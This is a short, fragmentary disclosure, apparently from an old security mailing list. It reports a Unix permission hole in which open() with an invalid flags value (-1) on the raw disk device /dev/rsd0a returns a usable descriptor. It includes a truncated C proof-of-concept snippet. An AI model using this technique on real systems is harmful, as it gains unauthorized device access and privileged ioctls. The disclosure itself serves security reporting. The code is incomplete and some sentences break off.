This was sent to me recently... It seems to be a pretty serious hole
in open() and permissions...
Note, in the following, open() succeeds, and ioctls are probably
* This will give you a file descriptor on a device you should not have
* access to. This seems really, really screwed up, since holding a fd
* lets you do a lot of ioctls that you should not be able to do...
main(int argc, char **argv)
fd = open("/dev/rsd0a", -1, 0);
if (fd < 0)